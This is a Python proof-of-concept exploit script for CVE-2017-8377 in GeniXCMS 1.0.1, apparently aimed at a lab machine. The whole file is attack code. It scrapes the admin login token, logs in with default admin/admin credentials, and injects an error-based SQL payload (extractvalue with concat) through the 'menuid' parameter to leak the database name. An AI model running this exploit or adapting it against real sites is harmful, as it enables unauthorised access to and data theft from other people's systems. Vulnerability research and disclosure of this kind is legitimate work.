GeniXCMS-CVE-2017-8377.py

c@kali:~/src$ cat GeniXCMS-CVE-2017-8377.py
#!/usr/bin/env python
# sweet and dirty poc for CVE-2017-8377
# poc by code16 @ 24.07.2017
# 

import requests
import re

target = 'http://192.168.56.102/genix/GeniXCMS-v1.0.1/' # gxadmin/login.php'
##
def main():
  print "[+] Checking:", target

  session = requests.session()
  sesslink = 'http://192.168.56.102/genix/GeniXCMS-v1.0.1/gxadmin/login.php'

  # get token req...
  getToken = session.get(sesslink)
  sessResp = getToken.text

  token_find = re.compile('input type="hidden" name="token" value="(.*?)"')
  token_found = re.search(token_find, sessResp)

  if token_found:
    got_token = token_found.group(1)
    print '[+] Found token!'# :', got_token

    print '[+] Log me now..'

    data_login = {
      'username':'admin',
      'password':'admin',
      'token':got_token,
      'login':''
    }

    login_link = sesslink # same

    doLogin = session.post(login_link, data=data_login)
    loginResp = doLogin.text

    if 'Dashboard' in loginResp:
      print '[+] We are admin now. Exploiting...'

      # last req with payload:
      exp_link = target + "/gxadmin/index.php?page=menus&token=" + got_token
      exp_link += "&act=remove&menuid=test'/**/or/**/extractvalue(1,concat(0x7e,database()))/**/or'"

      lastreq = session.get(exp_link)
      lastresp = lastreq.text

      find_summary = re.compile("Query failed: XPATH syntax error: (.*?)<br />")
      found_summary = re.search(find_summary, lastresp)

      if found_summary:
        print '[+] DB name is:',found_summary.group(1)

## main:
main()